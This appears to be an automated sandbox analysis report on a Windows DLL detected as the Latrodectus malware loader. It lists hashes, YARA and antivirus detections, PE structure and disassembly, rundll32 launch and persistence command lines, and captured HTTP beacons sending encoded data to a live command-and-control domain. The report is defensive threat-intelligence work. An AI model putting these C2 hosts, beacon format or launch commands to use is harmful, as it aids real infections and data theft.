                        SHA-256:9645A12079EDFFD20560D4631160A6052AE5728D6F73B7366588166AD281C534
                        SHA-512:8EFBA2B2CB757DECC55C7B2AEDB1A7B2645D95DDB22087F20D713456BFB6D09B90779370E7C8D8E567D22D8E96D7239F9B65152C6879CBDF9258CF02F690C7A0
                        Malicious:true
                        Yara Hits:
                        • Rule: JoeSecurity_Latrodectus, Description: Yara detected Latrodectus, Source: C:\Users\user\AppData\Roaming\Custom_update\Update_8c0cffeb.dll, Author: Joe Security
                        Antivirus:
                        • Antivirus: Avira, Detection: 100%
                        • Antivirus: ReversingLabs, Detection: 66%
                        • Antivirus: Virustotal, Detection: 80%, Browse
                        Reputation:low
                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........{............p.+...........D......D......D.....Rich............PE..d...N..f.........." .........4......|<.......................................@............`.............................................x.......<............ ...............0..........................................................@............................text............................... ..`.rdata..............................@..@.data...`#..........................@....pdata....... ......................@..@.reloc.......0......................@..B................................................................................................................................................................................................................................................................................................................................................
                        File type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                        Entropy (8bit):5.602203637771727
                        TrID:
                        • Win64 Dynamic Link Library (generic) (102004/3) 86.43%
                        • Win64 Executable (generic) (12005/4) 10.17%
                        • Generic Win/DOS Executable (2004/3) 1.70%
                        • DOS Executable Generic (2002/1) 1.70%
                        • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.01%
                        File name:r2iL9TLvO3.dll
                        File size:61'440 bytes
                        MD5:d46476f7f27be8ef618b7646a46f5e66
                        SHA1:8219d1ead31d16f6380941827bf96a488453d5c0
                        SHA256:9645a12079edffd20560d4631160a6052ae5728d6f73b7366588166ad281c534
                        SHA512:8efba2b2cb757decc55c7b2aedb1a7b2645d95ddb22087f20d713456bfb6d09b90779370e7c8d8e567d22d8e96d7239f9b65152c6879cbdf9258cf02f690c7a0
                        SSDEEP:768:f0Io0O99dyyus8GhrFuNtxv4c/HFGKndcHrqzwzv1NTNaTWsyih:caO9qyVNKv4c/HFGLlzvi
                        TLSH:F5534F87EBA261E9DCBAD57486637527F8707C4D5038BB0A8F619E136F22720F52C784
                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........{..............p.+..............D.......D.......D......Rich............PE..d...N..f.........." .........4......|<.............
                        Icon Hash:7ae282899bbab082
                        Entrypoint:0x180003c7c
                        Entrypoint Section:.text
                        Digitally signed:false
                        Imagebase:0x180000000
                        Subsystem:windows gui
                        Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, DLL
                        DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT
                        Time Stamp:0x6613D54E [Mon Apr 8 11:30:22 2024 UTC]
                        TLS Callbacks:
                        CLR (.Net) Version:
                        OS Version Major:6
                        OS Version Minor:0
                        File Version Major:6
                        File Version Minor:0
                        Subsystem Version Major:6
                        Subsystem Version Minor:0
                        Import Hash:db7aeb75528663639689f852fd366243
                        Instruction
                        dec esp
                        mov dword ptr [esp+18h], eax
                        mov dword ptr [esp+10h], edx
                        dec eax
                        mov dword ptr [esp+08h], ecx
                        dec eax
                        sub esp, 18h
                        mov eax, dword ptr [esp+28h]
                        mov dword ptr [esp], eax
                        cmp dword ptr [esp], 01h
                        je 00007F24AD201114h
                        jmp 00007F24AD20111Eh
                        dec eax
                        mov eax, dword ptr [esp+20h]
                        dec eax
                        mov dword ptr [0000C837h], eax
                        mov eax, 00000001h
                        dec eax
                        add esp, 18h
                        ret
                        int3
                        dec eax
                        sub esp, 38h
                        call 00007F24AD200CC0h
                        mov dword ptr [esp+20h], eax
                        cmp dword ptr [esp+20h], 00000000h
                        jne 00007F24AD201125h
                        xor eax, eax
                        cmp eax, 01h
                        je 00007F24AD20111Eh
                        mov ecx, 000003E8h
                        call 00007F24AD209D70h
                        jmp 00007F24AD2010FFh
                        xor eax, eax
                        dec eax
                        add esp, 38h
                        ret
                        int3
                        int3
                        dec eax
                        sub esp, 28h
                        call 00007F24AD2010DCh
                        xor eax, eax
                        dec eax
                        add esp, 28h
                        ret
                        dec esp
                        mov dword ptr [esp+18h], eax
                        mov dword ptr [esp+10h], edx
                        dec eax
                        mov dword ptr [esp+08h], ecx
                        dec eax
                        sub esp, 000001C8h
                        cmp dword ptr [esp+000001D8h], 12h
                        je 00007F24AD201152h
                        cmp dword ptr [esp+000001D8h], 0Eh
                        je 00007F24AD201148h
                        cmp dword ptr [esp+000001D8h], 0Ch
                        je 00007F24AD20113Eh
                        cmp dword ptr [esp+000001D8h], 0Dh
                        je 00007F24AD201134h
                        cmp dword ptr [esp+000001D8h], 0Fh
                        je 00007F24AD20112Ah
                        cmp dword ptr [esp+000001D8h], 04h
                        NameVirtual AddressVirtual Size Is in Section
                        IMAGE_DIRECTORY_ENTRY_EXPORT0xe4800x78.rdata
                        IMAGE_DIRECTORY_ENTRY_IMPORT0xe4f80x3c.rdata
                        IMAGE_DIRECTORY_ENTRY_RESOURCE0x00x0
                        IMAGE_DIRECTORY_ENTRY_EXCEPTION0x120000x6d8.pdata
                        IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                        IMAGE_DIRECTORY_ENTRY_BASERELOC0x130000xc.reloc
                        IMAGE_DIRECTORY_ENTRY_DEBUG0xe0900x1c.rdata
                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                        IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                        IMAGE_DIRECTORY_ENTRY_IAT0xe0000x40.rdata
                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                        NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                        .text0x10000xc3cc0xc400daced1e25a37750d3e573d26743527aaFalse0.40439652423469385zlib compressed data5.42109374466797IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                        .rdata0xe0000x5d60x6001443fcdf6d941caad8a894b59cbf8317False0.5442708333333334data4.56235176800514IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                        .data0xf0000x23600x1600c6f791ef0b88e56476abb0f454a0cd63False0.5024857954545454data6.676622463781846IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                        .pdata0x120000x6d80x8005d61590e3fcef31da47c9638e83a1d10False0.4541015625data3.871670986438023IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                        .reloc0x130000xc0x200f3469c0b0ee9c852546ac64a5d6db5b3False0.044921875data0.08153941234324169IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                        DLLImport
                        KERNEL32.dllPeekNamedPipe, GetLastError, CreateMutexW
                        USER32.dllMessageBeep, MessageBoxA
                        NameOrdinalAddress
                        extra10x180003ce4
                        follower20x180003ce4
                        run30x180003ce4
                        scub40x180003ce4
                        TimestampSource PortDest PortSource IPDest IP
                        Jul 8, 2024 11:40:41.335103989 CEST49708443192.168.2.7188.114.96.3
                        Jul 8, 2024 11:40:41.335155964 CEST44349708188.114.96.3192.168.2.7
                        Jul 8, 2024 11:40:41.335226059 CEST49708443192.168.2.7188.114.96.3
                        Jul 8, 2024 11:40:41.349721909 CEST49708443192.168.2.7188.114.96.3
                        Jul 8, 2024 11:40:41.349756956 CEST44349708188.114.96.3192.168.2.7
                        Jul 8, 2024 11:40:41.828989029 CEST44349708188.114.96.3192.168.2.7
                        Jul 8, 2024 11:40:41.829135895 CEST49708443192.168.2.7188.114.96.3
                        Jul 8, 2024 11:40:41.893208027 CEST49708443192.168.2.7188.114.96.3
                        Jul 8, 2024 11:40:41.893261909 CEST44349708188.114.96.3192.168.2.7
                        Jul 8, 2024 11:40:41.893553972 CEST44349708188.114.96.3192.168.2.7
                        Jul 8, 2024 11:40:41.897325993 CEST49708443192.168.2.7188.114.96.3
                        Jul 8, 2024 11:40:41.901226997 CEST49708443192.168.2.7188.114.96.3
                        Jul 8, 2024 11:40:41.944502115 CEST44349708188.114.96.3192.168.2.7
                        Jul 8, 2024 11:41:20.672075033 CEST44349708188.114.96.3192.168.2.7
                        Jul 8, 2024 11:41:20.672158957 CEST44349708188.114.96.3192.168.2.7
                        Jul 8, 2024 11:41:20.672167063 CEST49708443192.168.2.7188.114.96.3
                        Jul 8, 2024 11:41:20.672229052 CEST49708443192.168.2.7188.114.96.3
                        Jul 8, 2024 11:41:20.672512054 CEST49708443192.168.2.7188.114.96.3
                        Jul 8, 2024 11:41:20.672533989 CEST44349708188.114.96.3192.168.2.7
                        Jul 8, 2024 11:41:20.770823002 CEST49709443192.168.2.7188.114.96.3
                        Jul 8, 2024 11:41:20.770881891 CEST44349709188.114.96.3192.168.2.7
                        Jul 8, 2024 11:41:20.770953894 CEST49709443192.168.2.7188.114.96.3
                        Jul 8, 2024 11:41:20.771253109 CEST49709443192.168.2.7188.114.96.3
                        Jul 8, 2024 11:41:20.771265984 CEST44349709188.114.96.3192.168.2.7
                        Jul 8, 2024 11:41:21.277477026 CEST44349709188.114.96.3192.168.2.7
                        Jul 8, 2024 11:41:21.277558088 CEST49709443192.168.2.7188.114.96.3
                        Jul 8, 2024 11:41:21.278364897 CEST49709443192.168.2.7188.114.96.3
                        Jul 8, 2024 11:41:21.278378963 CEST44349709188.114.96.3192.168.2.7
                        Jul 8, 2024 11:41:21.280271053 CEST49709443192.168.2.7188.114.96.3
                        Jul 8, 2024 11:41:21.280277967 CEST44349709188.114.96.3192.168.2.7
                        TimestampSource PortDest PortSource IPDest IP
                        Jul 8, 2024 11:40:41.309509039 CEST5736653192.168.2.71.1.1.1
                        Jul 8, 2024 11:40:41.329724073 CEST53573661.1.1.1192.168.2.7
                        Jul 8, 2024 11:41:20.717067003 CEST6303653192.168.2.71.1.1.1
                        Jul 8, 2024 11:41:20.753175974 CEST53630361.1.1.1192.168.2.7
                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                        Jul 8, 2024 11:40:41.309509039 CEST192.168.2.71.1.1.10x3666Standard query (0)winarkamaps.comA (IP address)IN (0x0001)false
                        Jul 8, 2024 11:41:20.717067003 CEST192.168.2.71.1.1.10xa83dStandard query (0)stratimasesstr.comA (IP address)IN (0x0001)false
                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                        Jul 8, 2024 11:40:41.329724073 CEST1.1.1.1192.168.2.70x3666No error (0)winarkamaps.com188.114.96.3A (IP address)IN (0x0001)false
                        Jul 8, 2024 11:40:41.329724073 CEST1.1.1.1192.168.2.70x3666No error (0)winarkamaps.com188.114.97.3A (IP address)IN (0x0001)false
                        Jul 8, 2024 11:41:20.753175974 CEST1.1.1.1192.168.2.70xa83dName error (3)stratimasesstr.comnonenoneA (IP address)IN (0x0001)false
                        • winarkamaps.com
                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        0192.168.2.749708188.114.96.34437620C:\Windows\System32\rundll32.exe
                        TimestampBytes transferredDirectionData
                        2024-07-08 09:40:41 UTC228OUTPOST /live/ HTTP/1.1
                        Accept: */*
                        Content-Type: application/x-www-form-urlencoded
                        User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                        Host: winarkamaps.com
                        Content-Length: 252
                        Cache-Control: no-cache
                        2024-07-08 09:40:41 UTC252OUTData Raw: 59 6a 4f 65 45 79 69 4d 6b 33 52 72 45 35 76 63 43 2f 48 57 43 62 45 64 32 4e 53 69 43 7a 4d 56 35 78 6e 48 68 4b 65 68 58 57 4b 50 55 63 2b 46 6d 46 52 61 74 36 62 77 37 38 45 4b 6d 58 65 6a 65 5a 4b 42 57 4c 55 55 66 73 39 46 6c 6f 50 4d 66 50 75 2b 39 73 4c 38 4b 58 7a 4a 63 68 4f 51 37 43 39 69 48 30 48 66 5a 53 5a 75 36 61 49 57 70 77 31 45 46 41 30 63 77 78 6d 54 71 68 42 76 51 73 58 76 74 49 4f 2f 45 6e 62 64 66 67 4f 67 65 2f 7a 75 53 32 43 34 35 45 35 30 37 36 4b 75 34 2f 47 73 61 56 5a 46 79 53 67 75 76 77 37 4c 44 44 71 59 52 6f 35 39 77 42 56 51 30 31 71 59 6c 65 79 6c 70 4d 43 66 33 62 51 4e 51 73 68 78 77 4d 6a 6b 31 64 76 36 6f 4e 6b 59 79 62 65 6d 6e 4d 53 4b 54 62 2f 69 56 2b 5a 38 53 73 61 62 65 70 50 48 54 42 41 58 47 70 6e 41
                        Data Ascii: YjOeEyiMk3RrE5vcC/HWCbEd2NSiCzMV5xnHhKehXWKPUc+FmFRat6bw78EKmXejeZKBWLUUfs9FloPMfPu+9sL8KXzJchOQ7C9iH0HfZSZu6aIWpw1EFA0cwxmTqhBvQsXvtIO/EnbdfgOge/zuS2C45E5076Ku4/GsaVZFySguvw7LDDqYRo59wBVQ01qYleylpMCf3bQNQshxwMjk1dv6oNkYybemnMSKTb/iV+Z8SsabepPHTBAXGpnA
                        2024-07-08 09:41:20 UTC737INHTTP/1.1 522
                        Date: Mon, 08 Jul 2024 09:41:20 GMT
                        Content-Type: text/plain; charset=UTF-8
                        Content-Length: 15
                        Connection: close
                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2Bxzd0xFqHv6A62r6fwPVvTaEZSKvPmQSGyyowF%2BeMQ0UBCHz37nntcBM3xmi6htiI5IslgrljYIFQGR65G%2FuyAxNouhsIyx74fZniytv5Ng40QNv5ixvsqXZSbFju3CRQZA%3D"}],"group":"cf-nel","max_age":604800}
                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                        X-Frame-Options: SAMEORIGIN
                        Referrer-Policy: same-origin
                        Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                        Expires: Thu, 01 Jan 1970 00:00:01 GMT
                        Server: cloudflare
                        CF-RAY: 89ff1d423a374333-EWR
                        alt-svc: h3=":443"; ma=86400
                        2024-07-08 09:41:20 UTC15INData Raw: 65 72 72 6f 72 20 63 6f 64 65 3a 20 35 32 32
                        Data Ascii: error code: 522


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        1192.168.2.749709188.114.96.34437620C:\Windows\System32\rundll32.exe
                        TimestampBytes transferredDirectionData
                        2024-07-08 09:41:21 UTC228OUTPOST /live/ HTTP/1.1
                        Accept: */*
                        Content-Type: application/x-www-form-urlencoded
                        User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                        Host: winarkamaps.com
                        Content-Length: 252
                        Cache-Control: no-cache
                        2024-07-08 09:41:21 UTC252OUTData Raw: 59 6a 4f 65 45 79 69 4d 6b 33 52 72 45 35 76 63 43 2f 48 57 43 62 45 64 32 4e 53 69 43 7a 4d 56 35 78 6e 48 68 4b 65 68 58 57 4b 50 55 63 2b 46 6d 46 52 61 74 36 62 77 37 38 45 4b 6d 58 65 6a 65 5a 4b 42 57 4c 55 55 66 73 39 46 6c 6f 50 4d 66 50 75 2b 39 73 4c 38 4b 58 7a 4a 63 68 4f 51 37 43 39 69 48 30 48 66 5a 53 5a 75 36 61 49 57 70 77 31 45 46 41 30 63 77 78 6d 54 71 68 42 76 51 73 58 76 74 49 4f 2f 45 6e 62 64 66 67 4f 67 65 2f 7a 75 53 32 43 34 35 45 35 30 37 36 4b 75 34 2f 47 73 61 56 5a 46 79 53 67 75 76 77 37 4c 44 44 71 59 52 6f 35 39 77 42 56 51 30 31 71 59 6c 65 79 6c 70 4d 43 66 33 62 51 4e 51 73 68 78 77 4d 6a 6b 31 64 76 36 6f 4e 6b 59 79 62 65 6d 6e 4d 53 4b 54 62 2f 69 56 2b 5a 38 53 73 61 62 65 70 50 48 54 42 41 58 47 70 6e 41
                        Data Ascii: YjOeEyiMk3RrE5vcC/HWCbEd2NSiCzMV5xnHhKehXWKPUc+FmFRat6bw78EKmXejeZKBWLUUfs9FloPMfPu+9sL8KXzJchOQ7C9iH0HfZSZu6aIWpw1EFA0cwxmTqhBvQsXvtIO/EnbdfgOge/zuS2C45E5076Ku4/GsaVZFySguvw7LDDqYRo59wBVQ01qYleylpMCf3bQNQshxwMjk1dv6oNkYybemnMSKTb/iV+Z8SsabepPHTBAXGpnA


                        Click to jump to process

                        Click to jump to process

                        Click to dive into process behavior distribution

                        Click to jump to process

                        Target ID:0
                        Start time:05:39:20
                        Start date:08/07/2024
                        Path:C:\Windows\System32\loaddll64.exe
                        Wow64 process (32bit):false
                        Commandline:loaddll64.exe "C:\Users\user\Desktop\r2iL9TLvO3.dll"
                        Imagebase:0x7ff622450000
                        File size:165'888 bytes
                        MD5 hash:763455F9DCB24DFEECC2B9D9F8D46D52
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:high
                        Has exited:true

                        Target ID:1
                        Start time:05:39:20
                        Start date:08/07/2024
                        Path:C:\Windows\System32\conhost.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Imagebase:0x7ff75da10000
                        File size:862'208 bytes
                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:high
                        Has exited:true

                        Target ID:2
                        Start time:05:39:20
                        Start date:08/07/2024
                        Path:C:\Windows\System32\cmd.exe
                        Wow64 process (32bit):false
                        Commandline:cmd.exe /C rundll32.exe "C:\Users\user\Desktop\r2iL9TLvO3.dll",#1
                        Imagebase:0x7ff740e60000
                        File size:289'792 bytes
                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:high
                        Has exited:true

                        Target ID:3
                        Start time:05:39:20
                        Start date:08/07/2024
                        Path:C:\Windows\System32\rundll32.exe
                        Wow64 process (32bit):false
                        Commandline:rundll32.exe C:\Users\user\Desktop\r2iL9TLvO3.dll,extra
                        Imagebase:0x7ff617b80000
                        File size:71'680 bytes
                        MD5 hash:EF3179D498793BF4234F708D3BE28633
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Yara matches:
                        • Rule: JoeSecurity_Latrodectus, Description: Yara detected Latrodectus, Source: 00000003.00000002.1295006377.00007FFB1E861000.00000020.00000001.01000000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_Latrodectus, Description: Yara detected Latrodectus, Source: 00000003.00000003.1294422202.000001ED7A460000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                        Reputation:high
                        Has exited:true

                        Target ID:4
                        Start time:05:39:20
                        Start date:08/07/2024
                        Path:C:\Windows\System32\rundll32.exe
                        Wow64 process (32bit):false
                        Commandline:rundll32.exe "C:\Users\user\Desktop\r2iL9TLvO3.dll",#1
                        Imagebase:0x7ff617b80000
                        File size:71'680 bytes
                        MD5 hash:EF3179D498793BF4234F708D3BE28633
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:high
                        Has exited:true

                        Target ID:6
                        Start time:05:39:20
                        Start date:08/07/2024
                        Path:C:\Windows\System32\rundll32.exe
                        Wow64 process (32bit):false
                        Commandline:rundll32.exe "C:\Users\user\AppData\Roaming\Custom_update\Update_8c0cffeb.dll", extra
                        Imagebase:0x7ff617b80000
                        File size:71'680 bytes
                        MD5 hash:EF3179D498793BF4234F708D3BE28633
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Yara matches:
                        • Rule: JoeSecurity_Latrodectus, Description: Yara detected Latrodectus, Source: 00000006.00000002.2559163401.00007FFB1C811000.00000020.00000001.01000000.00000005.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_Latrodectus, Description: Yara detected Latrodectus, Source: 00000006.00000002.2556577168.00000081943F8000.00000004.00000010.00020000.00000000.sdmp, Author: Joe Security
                        Reputation:high
                        Has exited:false

                        Target ID:7
                        Start time:05:39:20
                        Start date:08/07/2024
                        Path:C:\Windows\System32\rundll32.exe
                        Wow64 process (32bit):false
                        Commandline:rundll32.exe "C:\Users\user\AppData\Roaming\Custom_update\Update_8c0cffeb.dll", extra
                        Imagebase:0x7ff617b80000
                        File size:71'680 bytes
                        MD5 hash:EF3179D498793BF4234F708D3BE28633
                        Has elevated privileges:false
                        Has administrator privileges:false
                        Programmed in:C, C++ or other language
                        Reputation:high
                        Has exited:true

                        Target ID:9
                        Start time:05:39:23
                        Start date:08/07/2024
                        Path:C:\Windows\System32\rundll32.exe
                        Wow64 process (32bit):false
                        Commandline:rundll32.exe C:\Users\user\Desktop\r2iL9TLvO3.dll,follower
                        Imagebase:0x7ff617b80000
                        File size:71'680 bytes
                        MD5 hash:EF3179D498793BF4234F708D3BE28633
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:high
                        Has exited:true

                        Target ID:10
                        Start time:05:39:26
                        Start date:08/07/2024
                        Path:C:\Windows\System32\rundll32.exe
                        Wow64 process (32bit):false
                        Commandline:rundll32.exe C:\Users\user\Desktop\r2iL9TLvO3.dll,run
                        Imagebase:0x7ff617b80000
                        File size:71'680 bytes
                        MD5 hash:EF3179D498793BF4234F708D3BE28633
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:high
                        Has exited:true

                        Reset < >

                          Execution Graph

                          Execution Coverage:31.6%
                          Dynamic/Decrypted Code Coverage:0%
                          Signature Coverage:18.7%
                          Total number of Nodes:1023
                          Total number of Limit Nodes:10
                          execution_graph 3961 7ffb1e865750 3964 7ffb1e8657d9 3961->3964 3963 7ffb1e865879 3976 7ffb1e865846 new[] 3964->3976 3985 7ffb1e86c934 NtDelayExecution 3964->3985 3967 7ffb1e86bae0 NtAllocateVirtualMemory 3967->3976 3968 7ffb1e865d53 wsprintfA 3971 7ffb1e86b984 3 API calls 3968->3971 3969 7ffb1e865b3f wsprintfA 3969->3976 3970 7ffb1e865c2e wsprintfA 3970->3976 3971->3976 3973 7ffb1e867b40 NtFreeVirtualMemory 3973->3976 3974 7ffb1e86ad34 NtAllocateVirtualMemory 3974->3976 3975 7ffb1e86b984 3 API calls 3975->3976 3976->3963 3976->3967 3976->3968 3976->3969 3976->3970 3976->3973 3976->3974 3976->3975 3981 7ffb1e8688a4 GetCursorPos GetTickCount RtlRandom 3976->3981 3982 7ffb1e8661b4 GetExitCodeThread 3976->3982 3983 7ffb1e8661ed GetExitCodeThread 3976->3983 3986 7ffb1e86ce20 3976->3986 3992 7ffb1e8652c4 3976->3992 4003 7ffb1e867fa8 3976->4003 4029 7ffb1e866634 3976->4029 4033 7ffb1e864d20 3976->4033 4046 7ffb1e866370 3976->4046 4050 7ffb1e86541c 3976->4050 4062 7ffb1e86c934 NtDelayExecution 3976->4062 3981->3976 3982->3976 3983->3976 3985->3964 3990 7ffb1e86ce2e 3986->3990 3991 7ffb1e86ce30 3986->3991 3987 7ffb1e86ce7e 3989 7ffb1e867b40 NtFreeVirtualMemory 3987->3989 3988 7ffb1e867b40 NtFreeVirtualMemory 3988->3991 3989->3990 3990->3976 3991->3987 3991->3988 3993 7ffb1e8652fc 3992->3993 3994 7ffb1e86ad34 NtAllocateVirtualMemory 3993->3994 3995 7ffb1e865322 3994->3995 3996 7ffb1e86ad34 NtAllocateVirtualMemory 3995->3996 3997 7ffb1e865338 InternetCrackUrlA 3996->3997 3998 7ffb1e8653ae 3997->3998 3999 7ffb1e865394 3997->3999 3998->3976 4000 7ffb1e867b40 NtFreeVirtualMemory 3999->4000 4001 7ffb1e8653a1 4000->4001 4002 7ffb1e867b40 NtFreeVirtualMemory 4001->4002 4002->3998 4004 7ffb1e86ad34 NtAllocateVirtualMemory 4003->4004 4005 7ffb1e867fd6 4004->4005 4006 7ffb1e867fea GetAdaptersInfo 4005->4006 4007 7ffb1e867fe3 4005->4007 4008 7ffb1e868011 4006->4008 4027 7ffb1e8681df 4006->4027 4007->3976 4009 7ffb1e86ad34 NtAllocateVirtualMemory 4008->4009 4011 7ffb1e86801c GetAdaptersInfo 4009->4011 4010 7ffb1e86820c 4013 7ffb1e86ad34 NtAllocateVirtualMemory 4010->4013 4014 7ffb1e868049 4011->4014 4012 7ffb1e867b40 NtFreeVirtualMemory 4012->4010 4015 7ffb1e86821f 4013->4015 4019 7ffb1e86806a wsprintfA 4014->4019 4015->4007 4016 7ffb1e868230 GetComputerNameExA 4015->4016 4017 7ffb1e8682ad GetComputerNameExA 4016->4017 4021 7ffb1e868249 4016->4021 4018 7ffb1e86835f 4017->4018 4023 7ffb1e8682ca 4017->4023 4020 7ffb1e867b40 NtFreeVirtualMemory 4018->4020 4026 7ffb1e868086 4019->4026 4020->4007 4022 7ffb1e86827e wsprintfA 4021->4022 4022->4017 4024 7ffb1e86832a wsprintfA 4023->4024 4024->4018 4025 7ffb1e8681ab wsprintfA 4025->4026 4025->4027 4026->4025 4026->4027 4028 7ffb1e868136 wsprintfA 4026->4028 4027->4010 4027->4012 4028->4026 4030 7ffb1e866649 4029->4030 4032 7ffb1e86665a 4029->4032 4031 7ffb1e86ad34 NtAllocateVirtualMemory 4030->4031 4030->4032 4031->4032 4032->3976 4036 7ffb1e864d55 4033->4036 4034 7ffb1e8652c4 3 API calls 4034->4036 4035 7ffb1e864c70 InternetOpenW InternetConnectA 4035->4036 4036->4034 4036->4035 4037 7ffb1e867b40 NtFreeVirtualMemory 4036->4037 4038 7ffb1e864eb5 4036->4038 4039 7ffb1e86bae0 NtAllocateVirtualMemory 4036->4039 4063 7ffb1e865030 4036->4063 4076 7ffb1e864f58 4036->4076 4037->4036 4040 7ffb1e864f2e InternetCloseHandle 4038->4040 4041 7ffb1e864f39 4038->4041 4039->4036 4040->4041 4043 7ffb1e864f41 InternetCloseHandle 4041->4043 4044 7ffb1e864f4c 4041->4044 4043->4044 4044->3976 4047 7ffb1e866386 4046->4047 4048 7ffb1e86ad34 NtAllocateVirtualMemory 4047->4048 4049 7ffb1e8663a3 4047->4049 4048->4049 4049->3976 4051 7ffb1e865486 4050->4051 4052 7ffb1e86bae0 NtAllocateVirtualMemory 4051->4052 4060 7ffb1e8654a7 4052->4060 4053 7ffb1e8654b4 4053->3976 4054 7ffb1e86ce20 NtFreeVirtualMemory 4054->4060 4055 7ffb1e865738 4120 7ffb1e86d1c8 4055->4120 4058 7ffb1e867b40 NtFreeVirtualMemory 4058->4053 4059 7ffb1e86ccbc 2 API calls 4059->4060 4060->4053 4060->4054 4060->4055 4060->4059 4081 7ffb1e863cf4 4060->4081 4062->3976 4064 7ffb1e86507f 4063->4064 4065 7ffb1e8650f5 4064->4065 4066 7ffb1e865175 4064->4066 4067 7ffb1e86512a HttpOpenRequestA 4065->4067 4068 7ffb1e8651aa HttpOpenRequestA 4066->4068 4069 7ffb1e8651f3 4067->4069 4068->4069 4070 7ffb1e86522d 4069->4070 4071 7ffb1e86520a InternetSetOptionA 4069->4071 4073 7ffb1e8651fb 4069->4073 4072 7ffb1e86527f HttpSendRequestA 4070->4072 4074 7ffb1e865237 4070->4074 4071->4070 4072->4073 4073->4036 4075 7ffb1e865254 HttpSendRequestA 4074->4075 4075->4073 4077 7ffb1e864fa1 InternetReadFile 4076->4077 4078 7ffb1e864fe9 4077->4078 4080 7ffb1e864fc3 4077->4080 4078->4036 4079 7ffb1e86b058 3 API calls 4079->4080 4080->4077 4080->4078 4080->4079